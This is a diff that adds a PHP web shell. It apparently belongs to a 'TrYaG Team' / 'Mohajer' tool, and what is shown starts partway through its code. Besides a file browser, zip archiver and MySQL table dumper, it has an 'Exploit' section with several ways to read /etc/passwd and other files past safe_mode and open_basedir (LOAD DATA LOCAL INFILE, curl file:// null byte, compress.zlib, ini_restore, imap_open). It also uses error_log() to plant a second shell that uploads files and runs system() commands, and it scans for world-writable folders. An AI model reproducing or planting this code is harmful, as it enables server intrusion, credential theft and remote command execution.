+            echo "  <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$ctime</span></td>\n"; 
+            echo "  <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$mtime</span></td>\n"; 
+            echo "  <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">&lt;dir&gt;</span></td>\n"; 
+            echo "  <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$dirperm</span></td>\n"; 
+            echo "</tr>\n"; 
+            $dir_i++; 
+        } else { 
+            if($file=="..") { 
+                echo "<tr class=".getrowbg().">\n"; 
+                echo "  <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">Up dir</a></td>\n"; 
+                echo "</tr>\n"; 
+            } 
+        } 
+    } 
+}// while 
+@closedir($dirs); 
+
+echo"<tr bgcolor='#cccccc'><td colspan='6' height='5'></td></tr><FORM  method='POST'>"; 
+
+$dirs=@opendir($dir); 
+$file_i = '0'; 
+while ($file=@readdir($dirs)) { 
+    $filepath="$dir/$file"; 
+    $a=@is_dir($filepath); 
+    if($a=="0"){ 
+        $size=@filesize($filepath); 
+        $size=$size/1024 ; 
+        $size= @number_format($size, 3); 
+        if (@filectime($filepath) == @filemtime($filepath)) { 
+            $ctime=@date("Y-m-d H:i:s",@filectime($filepath)); 
+            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); 
+        } else { 
+            $ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>"; 
+            $mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>"; 
+        } 
+        @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4); 
+        echo "<tr class=".getrowbg().">\n"; 
+        echo "  <td style=\"padding-left: 5px;\">"; 
+        echo "<INPUT type=checkbox value=1 name=dl[$filepath]>"; 
+        echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n"; 
+        if  ($file == 'config.php') { 
+
+        echo "<a href=\"$filepath\" target=\"_blank\"><font color='yellow'>$file<STRONG></STRONG></a></td>\n"; 
+        } 
+        echo "  <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$ctime</span></td>\n"; 
+        echo "  <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$mtime</span></td>\n"; 
+        echo "  <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n"; 
+        echo "  <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$fileperm</span></td>\n"; 
+        echo "</tr>\n"; 
+        $file_i++; 
+
+
+    } 
+}// while 
+@closedir($dirs); 
+
+echo "</FORM>\n"; 
+echo "</table>\n"; 
+}// end dir 
+
+
+
+
+
+
+
+    function debuginfo() { 
+        global $starttime; 
+        $mtime = explode(' ', microtime()); 
+        $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6); 
+        echo "Processed in $totaltime second(s)"; 
+    } 
+
+
+    function stripslashes_array(&$array) { 
+        while(list($key,$var) = each($array)) { 
+            if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) { 
+                if (is_string($var)) { 
+                    $array[$key] = stripslashes($var); 
+                } 
+                if (is_array($var))  { 
+                    $array[$key] = stripslashes_array($var); 
+                } 
+            } 
+        } 
+        return $array; 
+    } 
+
+
+    function deltree($deldir) { 
+        $mydir=@dir($deldir); 
+        while($file=$mydir->read())    { 
+            if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { 
+                @chmod("$deldir/$file",0777); 
+                deltree("$deldir/$file"); 
+            } 
+            if (is_file("$deldir/$file")) { 
+                @chmod("$deldir/$file",0777); 
+                @unlink("$deldir/$file"); 
+            } 
+        } 
+        $mydir->close(); 
+        @chmod("$deldir",0777); 
+        return (@rmdir($deldir)) ? 1 : 0; 
+    } 
+
+
+    function dir_writeable($dir) { 
+        if (!is_dir($dir)) { 
+            @mkdir($dir, 0777); 
+        } 
+        if(is_dir($dir)) { 
+            if ($fp = @fopen("$dir/test.txt", 'w')) { 
+                @fclose($fp); 
+                @unlink("$dir/test.txt"); 
+                $writeable = 1; 
+            } else { 
+                $writeable = 0; 
+            } 
+        } 
+        return $writeable; 
+    } 
+
+
+    function getrowbg() { 
+        global $bgcounter; 
+        if ($bgcounter++%2==0) { 
+            return "firstalt"; 
+        } else { 
+            return "secondalt"; 
+        } 
+    } 
+
+
+    function getPath($mainpath, $relativepath) { 
+        global $dir; 
+        $mainpath_info           = explode('/', $mainpath); 
+        $relativepath_info       = explode('/', $relativepath); 
+        $relativepath_info_count = count($relativepath_info); 
+        for ($i=0; $i<$relativepath_info_count; $i++) { 
+            if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; 
+            if ($relativepath_info[$i] == '..') { 
+                $mainpath_info_count = count($mainpath_info); 
+                unset($mainpath_info[$mainpath_info_count-1]); 
+                continue; 
+            } 
+            $mainpath_info[count($mainpath_info)] = $relativepath_info[$i]; 
+        } 
+        return implode('/', $mainpath_info); 
+    } 
+
+
+    function getphpcfg($varname) { 
+        switch($result = get_cfg_var($varname)) { 
+            case 0: 
+            return "No"; 
+            break; 
+            case 1: 
+            return "Yes"; 
+            break; 
+            default: 
+            return $result; 
+            break; 
+        } 
+    } 
+
+
+    function getfun($funName) { 
+        return (false !== function_exists($funName)) ? "Yes" : "No"; 
+    } 
+
+
+    class PHPZip{ 
+    var $out=''; 
+        function PHPZip($dir)    { 
+            if (@function_exists('gzcompress'))    { 
+                $curdir = getcwd(); 
+                if (is_array($dir)) $filelist = $dir; 
+                else{ 
+                    $filelist=$this -> GetFileList($dir);//I?????±? 
+                    foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); 
+                } 
+                if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); 
+                else chdir($curdir); 
+                if (count($filelist)>0){ 
+                    foreach($filelist as $filename){ 
+                        if (is_file($filename)){ 
+                            $fd = fopen ($filename, "r"); 
+                            $content = @fread ($fd, filesize ($filename)); 
+                            fclose ($fd); 
+                            if (is_array($dir)) $filename = basename($filename); 
+                            $this -> addFile($content, $filename); 
+                        } 
+                    } 
+                    $this->out = $this -> file(); 
+                    chdir($curdir); 
+                } 
+                return 1; 
+            } 
+            else return 0; 
+        } 
+
+
+        function GetFileList($dir){ 
+            static $a; 
+            if (is_dir($dir)) { 
+                if ($dh = opendir($dir)) { 
+                       while (($file = readdir($dh)) !== false) { 
+                        if($file!='.' && $file!='..'){ 
+                            $f=$dir .'/'. $file; 
+                            if(is_dir($f)) $this->GetFileList($f); 
+                            $a[]=$f; 
+                        } 
+                    } 
+                     closedir($dh); 
+                } 
+            } 
+            return $a; 
+        } 
+
+        var $datasec      = array(); 
+        var $ctrl_dir     = array(); 
+        var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; 
+        var $old_offset   = 0; 
+
+        function unix2DosTime($unixtime = 0) { 
+            $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); 
+            if ($timearray['year'] < 1980) { 
+                $timearray['year']    = 1980; 
+                $timearray['mon']     = 1; 
+                $timearray['mday']    = 1; 
+                $timearray['hours']   = 0; 
+                $timearray['minutes'] = 0; 
+                $timearray['seconds'] = 0; 
+            } // end if 
+            return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | 
+                    ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); 
+        } 
+
+        function addFile($data, $name, $time = 0) { 
+            $name     = str_replace('\\', '/', $name); 
+
+            $dtime    = dechex($this->unix2DosTime($time)); 
+            $hexdtime = '\x' . $dtime[6] . $dtime[7] 
+                      . '\x' . $dtime[4] . $dtime[5] 
+                      . '\x' . $dtime[2] . $dtime[3] 
+                      . '\x' . $dtime[0] . $dtime[1]; 
+            eval('$hexdtime = "' . $hexdtime . '";'); 
+            $fr   = "\x50\x4b\x03\x04"; 
+            $fr   .= "\x14\x00"; 
+            $fr   .= "\x00\x00"; 
+            $fr   .= "\x08\x00"; 
+            $fr   .= $hexdtime; 
+
+            $unc_len = strlen($data); 
+            $crc     = crc32($data); 
+            $zdata   = gzcompress($data); 
+            $c_len   = strlen($zdata); 
+            $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2); 
+            $fr      .= pack('V', $crc); 
+            $fr      .= pack('V', $c_len); 
+            $fr      .= pack('V', $unc_len); 
+            $fr      .= pack('v', strlen($name)); 
+            $fr      .= pack('v', 0); 
+            $fr      .= $name; 
+
+            $fr .= $zdata; 
+
+            $fr .= pack('V', $crc); 
+            $fr .= pack('V', $c_len); 
+            $fr .= pack('V', $unc_len); 
+
+            $this -> datasec[] = $fr; 
+            $new_offset        = strlen(implode('', $this->datasec)); 
+
+            $cdrec = "\x50\x4b\x01\x02"; 
+            $cdrec .= "\x00\x00"; 
+            $cdrec .= "\x14\x00"; 
+            $cdrec .= "\x00\x00"; 
+            $cdrec .= "\x08\x00"; 
+            $cdrec .= $hexdtime; 
+            $cdrec .= pack('V', $crc); 
+            $cdrec .= pack('V', $c_len); 
+            $cdrec .= pack('V', $unc_len); 
+            $cdrec .= pack('v', strlen($name) ); 
+            $cdrec .= pack('v', 0 ); 
+            $cdrec .= pack('v', 0 ); 
+            $cdrec .= pack('v', 0 ); 
+            $cdrec .= pack('v', 0 ); 
+            $cdrec .= pack('V', 32 ); 
+            $cdrec .= pack('V', $this -> old_offset ); 
+            $this -> old_offset = $new_offset; 
+            $cdrec .= $name; 
+
+            $this -> ctrl_dir[] = $cdrec; 
+        } 
+
+        function file() { 
+            $data    = implode('', $this -> datasec); 
+            $ctrldir = implode('', $this -> ctrl_dir); 
+            return 
+                $data . 
+                $ctrldir . 
+                $this -> eof_ctrl_dir . 
+                pack('v', sizeof($this -> ctrl_dir)) . 
+                pack('v', sizeof($this -> ctrl_dir)) . 
+                pack('V', strlen($ctrldir)) . 
+                pack('V', strlen($data)) . 
+                "\x00\x00"; 
+        } 
+    } 
+
+    function sqldumptable($table, $fp=0) { 
+        $tabledump = "DROP TABLE IF EXISTS $table;\n"; 
+        $tabledump .= "CREATE TABLE $table (\n"; 
+
+        $firstfield=1; 
+
+        $fields = mysql_query("SHOW FIELDS FROM $table"); 
+        while ($field = mysql_fetch_array($fields)) { 
+            if (!$firstfield) { 
+                $tabledump .= ",\n"; 
+            } else { 
+                $firstfield=0; 
+            } 
+            $tabledump .= "   $field[Field] $field[Type]"; 
+            if (!empty($field["Default"])) { 
+                $tabledump .= " DEFAULT '$field[Default]'"; 
+            } 
+            if ($field['Null'] != "YES") { 
+                $tabledump .= " NOT NULL"; 
+            } 
+            if ($field['Extra'] != "") { 
+                $tabledump .= " $field[Extra]"; 
+            } 
+        } 
+        mysql_free_result($fields); 
+
+        $keys = mysql_query("SHOW KEYS FROM $table"); 
+        while ($key = mysql_fetch_array($keys)) { 
+            $kname=$key['Key_name']; 
+            if ($kname != "PRIMARY" and $key['Non_unique'] == 0) { 
+                $kname="UNIQUE|$kname"; 
+            } 
+            if(!is_array($index[$kname])) { 
+                $index[$kname] = array(); 
+            } 
+            $index[$kname][] = $key['Column_name']; 
+        } 
+        mysql_free_result($keys); 
+
+        while(list($kname, $columns) = @each($index)) { 
+            $tabledump .= ",\n"; 
+            $colnames=implode($columns,","); 
+
+            if ($kname == "PRIMARY") { 
+                $tabledump .= "   PRIMARY KEY ($colnames)"; 
+            } else { 
+                if (substr($kname,0,6) == "UNIQUE") { 
+                    $kname=substr($kname,7); 
+                } 
+                $tabledump .= "   KEY $kname ($colnames)"; 
+            } 
+        } 
+
+        $tabledump .= "\n);\n\n"; 
+        if ($fp) { 
+            fwrite($fp,$tabledump); 
+        } else { 
+            echo $tabledump; 
+        } 
+
+        $rows = mysql_query("SELECT * FROM $table"); 
+        $numfields = mysql_num_fields($rows); 
+        while ($row = mysql_fetch_array($rows)) { 
+            $tabledump = "INSERT INTO $table VALUES("; 
+
+            $fieldcounter=-1; 
+            $firstfield=1; 
+            while (++$fieldcounter<$numfields) { 
+                if (!$firstfield) { 
+                    $tabledump.=", "; 
+                } else { 
+                    $firstfield=0; 
+                } 
+
+                if (!isset($row[$fieldcounter])) { 
+                    $tabledump .= "NULL"; 
+                } else { 
+                    $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; 
+                } 
+            } 
+
+            $tabledump .= ");\n"; 
+
+            if ($fp) { 
+                fwrite($fp,$tabledump); 
+            } else { 
+                echo $tabledump; 
+            } 
+        } 
+        mysql_free_result($rows); 
+    } 
+
+    class FORMS { 
+        function tableheader() { 
+            echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n"; 
+        } 
+
+        function headerform($arg=array()) { 
+            global $dir; 
+            if ($arg[enctype]){ 
+                $enctype="enctype=\"$arg[enctype]\""; 
+            } else { 
+                $enctype=""; 
+            } 
+            if (!isset($arg[method])) { 
+                $arg[method] = "POST"; 
+            } 
+            if (!isset($arg[action])) { 
+                $arg[action] = ''; 
+            } 
+            echo "  <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n"; 
+            echo "  <tr>\n"; 
+            echo "    <td>".$arg[content]."</td>\n"; 
+            echo "  </tr>\n"; 
+            echo "  </form>\n"; 
+        } 
+
+        function tdheader($title) { 
+            global $dir; 
+            echo "  <tr class=\"firstalt\">\n"; 
+            echo "    <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">·mohajer</a>]</b></td>\n"; 
+            echo "  </tr>\n"; 
+        } 
+
+        function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') { 
+            if ($bgcolor=='2') { 
+                $css="secondalt"; 
+            } elseif ($bgcolor=='1') { 
+                $css="firstalt"; 
+            } else { 
+                $css=$bgcolor; 
+            } 
+            $height = empty($height) ? "" : " height=".$height; 
+            $colspan = empty($colspan) ? "" : " colspan=".$colspan; 
+            echo "  <tr class=\"".$css."\">\n"; 
+            echo "    <td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n"; 
+            echo "  </tr>\n"; 
+        } 
+
+        function tablefooter() { 
+            echo "</table>\n"; 
+        } 
+
+        function formheader($action='',$title,$target='') { 
+            global $dir; 
+            $target = empty($target) ? "" : " target=\"".$target."\""; 
+            echo " <form action=\"$action\" method=\"POST\"".$target.">\n"; 
+            echo "  <tr class=\"firstalt\">\n"; 
+            echo "    <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">·µ»?</a>]</b></td>\n"; 
+            echo "  </tr>\n"; 
+        } 
+
+        function makehidden($name,$value=''){ 
+            echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n"; 
+        } 
+
+        function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){ 
+            $css = ($css == 'input') ? " class=\"input\"" : ""; 
+            $input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n"; 
+            return $input; 
+        } 
+        function makeid($name,$value='',$extra='',$type='select',$size='30',$css='input'){ 
+            $css = ($css == 'input') ? " class=\"input\"" : ""; 
+            $input = "<select name=plugin><option>cat /etc/passwd</option></select>"; 
+            return $input; 
+        } 
+         function makeimp($name,$value='',$extra='',$type='select',$size='30',$css='input'){ 
+            $css = ($css == 'input') ? " class=\"input\"" : ""; 
+            $input = "<select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>"; 
+            return $input; 
+        } 
+        function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){ 
+            $textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n"; 
+            return $textarea; 
+        } 
+
+        function formfooter($over='',$height=''){ 
+            $height = empty($height) ? "" : " height=\"".$height."\""; 
+            echo "  <tr class=\"secondalt\">\n"; 
+            echo "    <td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value='mohajer'></td>\n"; 
+            echo "  </tr>\n"; 
+            echo " </form>\n"; 
+            echo $end = empty($over) ? "" : "</table>\n"; 
+        } 
+
+        function makeselect($arg = array()){ 
+            if ($arg[multiple]==1) { 
+                $multiple = " multiple"; 
+                if ($arg[size]>0) { 
+                    $size = "size=$arg[size]"; 
+                } 
+            } 
+            if ($arg[css]==0) { 
+                $css = "class=\"input\""; 
+            } 
+            $select = "<select $css name=\"$arg[name]\"$multiple $size>\n"; 
+                if (is_array($arg[option])) { 
+                    foreach ($arg[option] AS $key=>$value) { 
+                        if (!is_array($arg[selected])) { 
+                            if ($arg[selected]==$key) { 
+                                $select .= "<option value=\"$key\" selected>$value</option>\n"; 
+                            } else { 
+                                $select .= "<option value=\"$key\">$value</option>\n"; 
+                            } 
+
+                        } elseif (is_array($arg[selected])) { 
+                            if ($arg[selected][$key]==1) { 
+                                $select .= "<option value=\"$key\" selected>$value</option>\n"; 
+                            } else { 
+                                $select .= "<option value=\"$key\">$value</option>\n"; 
+                            } 
+                        } 
+                    } 
+                } 
+            $select .= "</select>\n"; 
+            return $select; 
+        } 
+    } 
+
+
+
+$tb->tableheader(); 
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: read file [SQL , id , CURL , copy , ini_restore , imap]    & Make file ERORR</b></td></tr></table>','center','top'); 
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>'); 
+
+
+$tb->headerform(array('content'=>'<FONT COLOR=RED>read file SQL:</FONT><br>' .$tb->makeinput('Mohajer22','/etc/passwd' ).$tb->makeinput('',Show,'Mohajer22','submit'))); 
+$tb->headerform(array('content'=>'<FONT COLOR=RED>read file id:</FONT><br>' .$tb->makeid('plugin','cat /etc/passwd' ).$tb->makeinput('',Show,'plugin','submit'))); 
+$tb->headerform(array('content'=>'<FONT COLOR=RED>read file CURL:</FONT><br>' .$tb->makeinput('curl','/etc/passwd' ).$tb->makeinput('',Show,'curl','submit'))); 
+$tb->headerform(array('content'=>'<FONT COLOR=RED>read file copy:</FONT><br>' .$tb->makeinput('copy','/etc/passwd' ).$tb->makeinput('',Show,'copy','submit'))); 
+$tb->headerform(array('content'=>'<FONT COLOR=RED>read file ini_restore:</FONT><br>' .$tb->makeinput('M2','/etc/passwd' ).$tb->makeinput('',Show,'M2','submit'))); 
+$tb->headerform(array('content'=>'<FONT COLOR=RED>read file or dir with imap:</FONT><br>' .$tb->makeimp('switch','/etc/passwd' ).$tb->makeinput('string','/etc/passwd' ).$tb->makeinput('string','Show','','submit'))); 
+$tb->headerform(array('content'=>'<FONT COLOR=RED>Make file ERORR:</FONT><br>' .$tb->makeinput('ER','Mohajer22.php' ).$tb->makeinput('ER','Write','ER','submit'))); 
+
+
+// read file SQL ( ) // 
+if(empty($_POST['Mohajer22'])){ 
+} else { 
+echo "read file SQL","<br>" ; 
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >"; 
+$file=$_POST['Mohajer22']; 
+
+
+$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf"; 
+$mysql_files = explode(':', $mysql_files_str); 
+
+$sql = array ( 
+"USE $mdb", 
+'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)', 
+"LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS " 
+. "TERMINATED BY       '__THIS_NEVER_HAPPENS__' " 
+. "ESCAPED BY          '' " 
+. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'", 
+
+"SELECT a FROM $tbl LIMIT 1" 
+); 
+mysql_connect ($mhost, $muser, $mpass); 
+
+                                foreach ($sql as $statement) { 
+                                   $q = mysql_query ($statement); 
+
+                                   if ($q == false) die ( 
+                                      "FAILED: " . $statement . "\n" . 
+                                      "REASON: " . mysql_error () . "\n" 
+                                   ); 
+
+                                   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue; 
+
+                                   echo htmlspecialchars($r[0]); 
+                                   mysql_free_result ($q); 
+                                } 
+echo "</textarea>"; 
+} 
+// ERORR // 
+if(empty($_POST['ER'])){ 
+} else { 
+$ERORR=$_POST['ER']; 
+echo  error_log(" 
+<html> 
+<head> 
+<title> Exploit: error_log() By * TrYaG Team  * </title> 
+<body bgcolor=\"#000000\"> 
+<table Width='100%' height='10%' bgcolor='#8C0404' border='1'> 
+<tr> 
+<td><center><font size='6' color='#BBB516'> By  TrYaG Team</font></center></td> 
+</tr> 
+</table> 
+<font color='#FF0000'> 
+</head> 
+<? 
+if(\$fileup == \"\"){ 
+ECHO \" reade for up \"; 
+}else{ 
+\$path= exec(\"pwd\"); 
+\$path .= \"/\$fileup_name\"; 
+\$CopyFile = copy(\$fileup,\"\$path\"); 
+if(\$CopyFile){ 
+echo \" up ok \"; 
+}else{ 
+echo \" no up \"; 
+} 
+} 
+if(empty(\$_POST['m'])){ 
+} else { 
+\$m=\$_POST['m']; 
+echo  system(\$m); 
+} 
+if(empty(\$_POST['cmd'])){ 
+} else { 
+\$h=  \$_POST['cmd']; 
+ print include(\$h) ; 
+} 
+?> 
+<form method='POST' enctype='multipart/form-data' > 
+<input type='file' name='fileup' size='20'> 
+<input type='submit' value='  up  '> 
+</form> 
+<form method='POST'  > 
+<input type='cmd' name='cmd' size='20'> 
+<input type='submit' value='  open (shill.txt) '> 
+</form> 
+<form method='POST' enctype='multipart/form-data' > 
+<input type='text' name='m' size='20'> 
+<input type='submit' value='  run  '> 
+<input type='reset' value=' reset '> 
+</form> 
+", 3,$ERORR); 
+} 
+
+// id // 
+if ($_POST['plugin'] ){ 
+echo "read file id" ,"<br>"; 
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >"; 
+
+
+
+                                           for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd 
+                                        $ara = posix_getpwuid($uid); 
+                                                if (!empty($ara)) { 
+                                                  while (list ($key, $val) = each($ara)){ 
+                                                    print "$val:"; 
+                                                  } 
+                                                  print "\n"; 
+                                                } 
+                                        } 
+                                 echo "</textarea>"; 
+                                break; 
+
+
+                                             } 
+
+
+// CURL // 
+if(empty($_POST['curl'])){ 
+
+} else { 
+echo "read file CURL","<br>" ; 
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >"; 
+$m=$_POST['curl']; 
+$ch = 
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__); 
+curl_exec($ch); 
+var_dump(curl_exec($ch)); 
+echo "</textarea>"; 
+} 
+
+// copy// 
+$u1p=""; 
+$tymczas=""; 
+if(empty($_POST['copy'])){ 
+} else { 
+echo "read file copy" ,"<br>"; 
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >"; 
+$u1p=$_POST['copy']; 
+$temp=tempnam($tymczas, "cx"); 
+if(copy("compress.zlib://".$u1p, $temp)){ 
+$zrodlo = fopen($temp, "r"); 
+$tekst = fread($zrodlo, filesize($temp)); 
+fclose($zrodlo); 
+echo "".htmlspecialchars($tekst).""; 
+unlink($temp); 
+echo "</textarea>"; 
+} else { 
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File 
+<B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have 
+access.</CENTER></FONT>"); 
+} 
+} 
+
+/// ini_restore // 
+if(empty($_POST['M2'])){ 
+} else { 
+echo "read file ini_restore","<br> "; 
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >"; 
+$m=$_POST['M2']; 
+echo ini_get("safe_mode"); 
+echo ini_get("open_basedir"); 
+$s=readfile("$m"); 
+ini_restore("safe_mode"); 
+ini_restore("open_basedir"); 
+echo ini_get("safe_mode"); 
+echo ini_get("open_basedir"); 
+$s=readfile("$m"); 
+echo "</textarea>"; 
+} 
+
+// imap // 
+
+$string = !empty($_POST['string']) ? $_POST['string'] : 0; 
+$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; 
+
+if ($string && $switch == "file") { 
+echo "read file imap" ,"<br>"; 
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >"; 
+
+$stream = imap_open($string, "", ""); 
+
+$str = imap_body($stream, 1); 
+if (!empty($str)) 
+echo "<pre>".$str."</pre>"; 
+imap_close($stream); 
+echo "</textarea>"; 
+} elseif ($string && $switch == "dir") { 
+echo "read  dir imap","<br>" ; 
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >"; 
+
+$stream = imap_open("/etc/passwd", "", ""); 
+if ($stream == FALSE) 
+die("Can't open imap stream"); 
+$string = explode("|",$string); 
+if (count($string) > 1) 
+$dir_list = imap_list($stream, trim($string[0]), trim($string[1])); 
+else 
+$dir_list = imap_list($stream, trim($string[0]), "*"); 
+echo "<pre>"; 
+for ($i = 0; $i < count($dir_list); $i++) 
+echo "$dir_list[$i]"."<p>&nbsp;</p>" ; 
+echo "</pre>"; 
+imap_close($stream); 
+echo "</textarea>"; 
+} 
+$tb->tdbody ("</td></tr></table>"); 
+// open dir // 
+$tb->tableheader(); 
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: Open dir </b></td></tr></table>','center','top'); 
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>'); 
+
+if(empty($_POST['m'])){ 
+echo "<div><FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'> 
+<table id=tb><tr><td><FONT COLOR=\"RED\">path dir</FONT> 
+<INPUT type='text' name='m' size=70 value='./'> 
+<INPUT type='submit' value='show' id=input></td></tr></table></form></div>"; 
+
+} else { 
+$m=$_POST['m']; 
+$spath = $m ; 
+$path = $m ; 
+
+
+
+
+        $method = intval(trim($_POST['method'])); 
+
+        $handle = opendir($path); 
+
+        $_folders = array(); 
+
+        $i = 0; 
+
+        while (false !== ($file = readdir($handle))) 
+        { 
+                $full_path = "$path/$file"; 
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4); 
+
+                if ((is_dir($full_path)) && ($perms == '0777')) 
+                { 
+                        if (!file_exists('.*')) { 
+
+                                $_folders[$i] = $file; 
+
+                                $i++; 
+                        } 
+                } 
+        } 
+
+
+        closedir($handle); 
+        clearstatcache(); 
+
+
+
+        echo '<strong><FONT COLOR=#00FF00>The folders is 777 :</strong><br />'; 
+
+        foreach ($_folders as $folder) 
+        { 
+                echo $folder.'<br />'; 
+        } 
+////////// 
+$handle = opendir($path); 
+
+        $_folders = array(); 
+
+        $i = 0; 
+
+ while (false !== ($file1 = readdir($handle))) 
+        { 
+                $full_path = "$path/$file1"; 
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4); 
+
+                if ((is_dir($full_path)) && ($perms == '0755')) 
+                { 
+                        if (!file_exists('.*')) { 
+
+                                $_folders[$i] = $file1; 
+
+                                $i++; 
+                        } 
+                } 
+        } 
+
+
+
+        clearstatcache(); 
+
+
+
+        echo '</FONT><strong><FONT COLOR=#FF9900>The folders is 755 :</strong><br />'; 
+
+        foreach ($_folders as $folder) 
+        { 
+                echo $folder.'<br />'; 
+        } 
+////////// 
+$handle = opendir($path); 
+
+        $_folders = array(); 
+
+        $i = 0; 
+
+ while (false !== ($file1 = readdir($handle))) 
+        { 
+                $full_path = "$path/$file1"; 
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4); 
+
+                if ((is_dir($full_path)) && ($perms == '0644')) 
+                { 
+                        if (!file_exists('.*')) { 
+
+                                $_folders[$i] = $file1; 
+
+                                $i++; 
+                        } 
+                } 
+        } 
+
+
+
+        clearstatcache(); 
+
+
+
+        echo '</FONT><strong><FONT COLOR=#CC9999>The folders is 644 :</strong><br />'; 
+
+        foreach ($_folders as $folder) 
+        { 
+                echo $folder.'<br />'; 
+        } 
+////////// 
+$handle = opendir($path); 
+
+        $_folders = array(); 
+
+        $i = 0; 
+
+ while (false !== ($file1 = readdir($handle))) 
+        { 
+                $full_path = "$path/$file1"; 
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4); 
+
+                if ((is_dir($full_path)) && ($perms == '0750')) 
+                { 
+                        if (!file_exists('.*')) { 
+
+                                $_folders[$i] = $file1; 
+
+                                $i++; 
+                        } 
+                } 
+        } 
+
+
+
+        clearstatcache(); 
+
+
+
+        echo '</FONT><strong><FONT COLOR=#9999CC>The folders is 750 :</strong><br />'; 
+
+        foreach ($_folders as $folder) 
+        { 
+                echo $folder.'<br />'; 
+        } 
+////////// 
+$handle = opendir($path); 
+
+        $_folders = array(); 
+
+        $i = 0; 
+
+ while (false !== ($file1 = readdir($handle))) 
+        { 
+                $full_path = "$path/$file1"; 
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4); 
+
+                if ((is_dir($full_path)) && ($perms == '0604')) 
+                { 
+                        if (!file_exists('.*')) { 
+
+                                $_folders[$i] = $file1; 
+
+                                $i++; 
+                        } 
+                } 
+        } 
+
+
+
+        clearstatcache(); 
+
+
+
+        echo '</FONT><strong><FONT COLOR=#669999>The folders is 604 :</strong><br />'; 
+
+        foreach ($_folders as $folder) 
+        { 
+                echo $folder.'<br />'; 
+        } 
+////////// 
+$handle = opendir($path); 
+
+        $_folders = array(); 
+
+        $i = 0; 
+
+ while (false !== ($file1 = readdir($handle))) 
+        { 
+                $full_path = "$path/$file1"; 
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4); 
+
+                if ((is_dir($full_path)) && ($perms == '0705')) 
+                { 
+                        if (!file_exists('.*')) { 
+
+                                $_folders[$i] = $file1; 
+
+                                $i++; 
+                        } 
+                } 
+        } 
+
+
+
+        clearstatcache(); 
+
+
+
+        echo '</FONT><strong><FONT COLOR=#336699>The folders is 705 :</strong><br />'; 
+
+        foreach ($_folders as $folder) 
+        { 
+                echo $folder.'<br />'; 
+        } 
